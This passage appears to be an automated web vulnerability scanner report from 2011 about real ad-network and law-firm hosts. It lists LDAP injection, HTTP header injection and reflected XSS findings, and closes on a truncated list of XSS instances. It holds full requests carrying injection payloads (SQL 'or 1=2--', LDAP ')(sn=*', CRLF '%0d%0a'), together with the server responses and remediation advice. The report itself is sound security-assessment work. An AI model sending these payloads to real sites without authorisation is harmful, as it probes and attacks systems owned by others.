<address>Apache/2.2.3 (CentOS) Server at www.tuckerellis.com Port 80</address>
</body></html>

Request 2

GET /tucker-favicon.ico?125991164%20or%201%3d2--%20=1 HTTP/1.1
Host: www.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response 2

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:21:44 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 16 Apr 2009 13:44:14 GMT
ETag: "787a4-57e-42776780"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ....................................j...o...l...........q...........w...j........&..j...........l.......l.......n...w........'..p
......l....O..l...r..h...............w...............p...y.......r...............o........Y...4..c.......m...o...........k....(..m.......o ......x........Q...,..o
..............q...W..g..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................$('9;;;;;;;;9"C#,1..7
..
7..1.=.@0.80..08.0@. .A*.2D.++.D2.*A..A6<:.<55<.:<6A..A.<..<..<..<.A..A.<..<..<..<.A..A.<..<..<..<.A..A.<..<..<..<.A..A.< .<..<. <.A....<5.<..<.5<...4.B<>-...2-><..499E%!G.F/)G!B.99=.....9

3.?&.3.,1...;;;;;;..31.$('9;;;;;;;;9"C#................................................................

2. LDAP injection previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://akatracking.esearchvision.com
Path:	/esi/redirect2.html

Issue detail

The esvaid parameter appears to be vulnerable to LDAP injection attacks.

The payloads 8ad6dbc7bbe7c3c8)(sn=* and 8ad6dbc7bbe7c3c8)!(sn=* were each submitted in the esvaid parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

Request 1

GET /esi/redirect2.html?esvstue=1305198071&esvadt=999999-2475-1260-1&esvq=private%20equity&esvrq=private%20equity&esvcrea=187139093&esvt=128-MSUSe20937&transferparams=0&esvaid=8ad6dbc7bbe7c3c8)(sn=*&url=http%3a%2f%2fad.doubleclick.net%2fclk%3b233236047%3b62821348%3bd%3fhttps%3a%2f%2fpersonal.vanguard.com%2fus%2ffunds%2fsnapshot%3fFundId%3d0051%26FundIntExt%3dINT%26WT.srch%3d1%3fWT.srch%3d1 HTTP/1.1
Host: akatracking.esearchvision.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ESVUSERID=f20c82c6e40fc343b5bded3feff6e6ee

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://ad.doubleclick.net/clk;233236047;62821348;d?https://personal.vanguard.com/us/funds/snapshot?FundId=0051&FundIntExt=INT&WT.srch=1?WT.srch=1
Set-Cookie: ESVA8ad6dbc7bbe7c3c8)(sn=*=esvcid=S1305198071_UIDf20c82c6e40fc343b5bded3feff6e6ee_ADOMSe_AGI1260_ADI2475_CRE187139093_TID20937_TRMcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d_RAWcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d;expires=Fri, 11 May 2012 11:01:14 GMT;path=/;domain=esearchvision.com
Set-Cookie: REFESEVA8ad6dbc7bbe7c3c8)(sn=*=;expires=Fri, 11 May 2012 11:01:14 GMT;path=/;domain=esearchvision.com
ETag: "c7728f1f5feca396220a5389a6a06c7d:1304367611"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Vary: Accept-Encoding
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Cache-Control: max-age=34117
Date: Thu, 12 May 2011 11:01:14 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

Request 2

GET /esi/redirect2.html?esvstue=1305198071&esvadt=999999-2475-1260-1&esvq=private%20equity&esvrq=private%20equity&esvcrea=187139093&esvt=128-MSUSe20937&transferparams=0&esvaid=8ad6dbc7bbe7c3c8)!(sn=*&url=http%3a%2f%2fad.doubleclick.net%2fclk%3b233236047%3b62821348%3bd%3fhttps%3a%2f%2fpersonal.vanguard.com%2fus%2ffunds%2fsnapshot%3fFundId%3d0051%26FundIntExt%3dINT%26WT.srch%3d1%3fWT.srch%3d1 HTTP/1.1
Host: akatracking.esearchvision.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ESVUSERID=f20c82c6e40fc343b5bded3feff6e6ee

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://ad.doubleclick.net/clk;233236047;62821348;d?https://personal.vanguard.com/us/funds/snapshot?FundId=0051&FundIntExt=INT&WT.srch=1?WT.srch=1
Set-Cookie: ESVA8ad6dbc7bbe7c3c8)!(sn=*=esvcid=S1305198071_UIDf20c82c6e40fc343b5bded3feff6e6ee_ADOMSe_AGI1260_ADI2475_CRE187139093_TID20937_TRMcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d_RAWcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d;expires=Fri, 11 May 2012 11:01:14 GMT;path=/;domain=esearchvision.com
Set-Cookie: REFESEVA8ad6dbc7bbe7c3c8)!(sn=*=;expires=Fri, 11 May 2012 11:01:14 GMT;path=/;domain=esearchvision.com
ETag: "c7728f1f5feca396220a5389a6a06c7d:1304367611"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Vary: Accept-Encoding
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Cache-Control: max-age=34117
Date: Thu, 12 May 2011 11:01:14 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

3. HTTP header injection previous next
There are 5 instances of this issue:

http://ad.doubleclick.net/activity [REST URL parameter 1]
http://akatracking.esearchvision.com/esi/redirect2.html [esvaid parameter]
http://akatracking.esearchvision.com/esi/redirect2.html [esvcrea parameter]
http://amch.questionmarket.com/adscgen/sta.php [code parameter]
http://amch.questionmarket.com/adscgen/sta.php [site parameter]

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

3.1. http://ad.doubleclick.net/activity [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/activity

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8e8e3%0d%0a4cbaf4bd3c9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8e8e3%0d%0a4cbaf4bd3c9;src=1170328;type=nytdd463;cat=dealb724;ord=1;num=5983610623516.143? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8e8e3
4cbaf4bd3c9;src=1170328;type=nytdd463;cat=dealb724;ord=1;num=5983610623516.143:
Date: Thu, 12 May 2011 11:05:21 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.2. http://akatracking.esearchvision.com/esi/redirect2.html [esvaid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://akatracking.esearchvision.com
Path:	/esi/redirect2.html

Issue detail

The value of the esvaid request parameter is copied into the Set-Cookie response header. The payload 62e27%0d%0a952543f233d was submitted in the esvaid parameter. This caused a response containing an injected HTTP header.

Request

GET /esi/redirect2.html?esvstue=1305198071&esvadt=999999-2475-1260-1&esvq=private%20equity&esvrq=private%20equity&esvcrea=187139093&esvt=128-MSUSe20937&transferparams=0&esvaid=62e27%0d%0a952543f233d&url=http%3a%2f%2fad.doubleclick.net%2fclk%3b233236047%3b62821348%3bd%3fhttps%3a%2f%2fpersonal.vanguard.com%2fus%2ffunds%2fsnapshot%3fFundId%3d0051%26FundIntExt%3dINT%26WT.srch%3d1%3fWT.srch%3d1 HTTP/1.1
Host: akatracking.esearchvision.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ESVUSERID=f20c82c6e40fc343b5bded3feff6e6ee

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://ad.doubleclick.net/clk;233236047;62821348;d?https://personal.vanguard.com/us/funds/snapshot?FundId=0051&FundIntExt=INT&WT.srch=1?WT.srch=1
Set-Cookie: ESVA62e27
952543f233d=esvcid=S1305198071_UIDf20c82c6e40fc343b5bded3feff6e6ee_ADOMSe_AGI1260_ADI2475_CRE187139093_TID20937_TRMcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d_RAWcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d;expires=Fri, 11 May 2012 11: 01:14 GMT;path=/;domain=esearchvision.com
Set-Cookie: REFESEVA62e27
952543f233d=;expires=Fri, 11 May 2012 11: 01:14 GMT;path=/;domain=esearchvision.com
ETag: "c7728f1f5feca396220a5389a6a06c7d:1304367611"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Vary: Accept-Encoding
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Cache-Control: max-age=34117
Date: Thu, 12 May 2011 11:01:14 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

3.3. http://akatracking.esearchvision.com/esi/redirect2.html [esvcrea parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://akatracking.esearchvision.com
Path:	/esi/redirect2.html

Issue detail

The value of the esvcrea request parameter is copied into the Set-Cookie response header. The payload 26685%0d%0a292b8d9985f was submitted in the esvcrea parameter. This caused a response containing an injected HTTP header.

Request

GET /esi/redirect2.html?esvstue=1305198071&esvadt=999999-2475-1260-1&esvq=private%20equity&esvrq=private%20equity&esvcrea=26685%0d%0a292b8d9985f&esvt=128-MSUSe20937&transferparams=0&esvaid=40007&url=http%3a%2f%2fad.doubleclick.net%2fclk%3b233236047%3b62821348%3bd%3fhttps%3a%2f%2fpersonal.vanguard.com%2fus%2ffunds%2fsnapshot%3fFundId%3d0051%26FundIntExt%3dINT%26WT.srch%3d1%3fWT.srch%3d1 HTTP/1.1
Host: akatracking.esearchvision.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ESVUSERID=f20c82c6e40fc343b5bded3feff6e6ee

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://ad.doubleclick.net/clk;233236047;62821348;d?https://personal.vanguard.com/us/funds/snapshot?FundId=0051&FundIntExt=INT&WT.srch=1?WT.srch=1
Set-Cookie: ESVA40007=esvcid=S1305198071_UIDf20c82c6e40fc343b5bded3feff6e6ee_ADOMSe_AGI1260_ADI2475_CRE26685
292b8d9985f_TID20937_TRMcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d_RAWcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d;expires=Fri, 11 May 2012 11: 01:14 GMT;path=/;domain=esearchvision.com
Set-Cookie: REFESEVA40007=;expires=Fri, 11 May 2012 11:01:14 GMT;path=/;domain=esearchvision.com
ETag: "c7728f1f5feca396220a5389a6a06c7d:1304367611"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Vary: Accept-Encoding
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Cache-Control: max-age=34117
Date: Thu, 12 May 2011 11:01:14 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

3.4. http://amch.questionmarket.com/adscgen/sta.php [code parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adscgen/sta.php

Issue detail

The value of the code request parameter is copied into the Location response header. The payload e513e%0d%0a4a7e0968d52 was submitted in the code parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/sta.php?survey_num=909615&site=312253240&code=e513e%0d%0a4a7e0968d52 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1; ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 11:16:19 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a231.dl
Set-Cookie: CS1=deleted; expires=Wed, 12-May-2010 11:16:18 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1_909615-1-1; expires=Mon, 02-Jul-2012 03:16:19 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0_909615-A76)M-0; expires=Mon, 02-Jul-2012 03:16:19 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=atlas&survey_num=909615&site=2-312253240-&code=e513e
4a7e0968d52
Content-Length: 33
Content-Type: text/html

/* /adsc/d909615/2/-1/randm.js */

3.5. http://amch.questionmarket.com/adscgen/sta.php [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adscgen/sta.php

Issue detail

The value of the site request parameter is copied into the Location response header. The payload 40cbd%0d%0a96c50092903 was submitted in the site parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/sta.php?survey_num=909615&site=40cbd%0d%0a96c50092903&code=214693346 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1; ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 11:16:14 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a231.dl
Set-Cookie: CS1=deleted; expires=Wed, 12-May-2010 11:16:13 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1_909615-1-1; expires=Mon, 02-Jul-2012 03:16:14 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0_909615-576)M-0; expires=Mon, 02-Jul-2012 03:16:14 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=atlas&survey_num=909615&site=-1-40cbd
96c50092903-&code=214693346
Content-Length: 44
Content-Type: text/html

/* /adsc/d909615/-1/200214693346/randm.js */

4. Cross-site scripting (reflected) previous next
There are 191 instances of this issue:

http://207.56.166.97/favicon.ico [REST URL parameter 1]
http://207.56.166.97/javascript/c_smartmenus.js [REST URL parameter 1]
http://207.56.166.97/javascript/c_smartmenus.js [REST URL parameter 2]
http://ad.amtk-media.com/iframe [@CPSC@ parameter]
http://ad.amtk-media.com/iframe [@CPSC@ parameter]
http://ad.amtk-media.com/iframe [name of an arbitrarily supplied request parameter]
http://ad.amtk-media.com/iframe [name of an arbitrarily supplied request parameter]
http://ad.amtk-media.com/iframe [target parameter]
http://ad.amtk-media.com/iframe [target parameter]
http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [ad parameter]
http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [ad parameter]
http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [camp parameter]
http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [camp parameter]
http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [goto parameter]
http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [goto parameter]
http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [name of an arbitrarily supplied request parameter]
http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [name of an arbitrarily supplied request parameter]
http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [opzn&page parameter]
http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [opzn&page parameter]
http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [pos parameter]
http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [pos parameter]
http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sn1 parameter]
http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sn1 parameter]
http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sn2 parameter]
http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sn2 parameter]
http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [snr parameter]
http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [snr parameter]
http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [snx parameter]
http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [snx parameter]
http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sz parameter]
http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sz parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [ad parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [ad parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [camp parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [camp parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [goto parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [goto parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [name of an arbitrarily supplied request parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [name of an arbitrarily supplied request parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [opzn&page parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [opzn&page parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [pos parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [pos parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sn1 parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sn1 parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sn2 parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sn2 parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [snr parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [snr parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [snx parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [snx parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sz parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sz parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [ad parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [ad parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [camp parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [camp parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [goto parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [goto parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [name of an arbitrarily supplied request parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [name of an arbitrarily supplied request parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [opzn&page parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [opzn&page parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [pos parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [pos parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sn1 parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sn1 parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sn2 parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sn2 parameter]
http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [snr parameter]
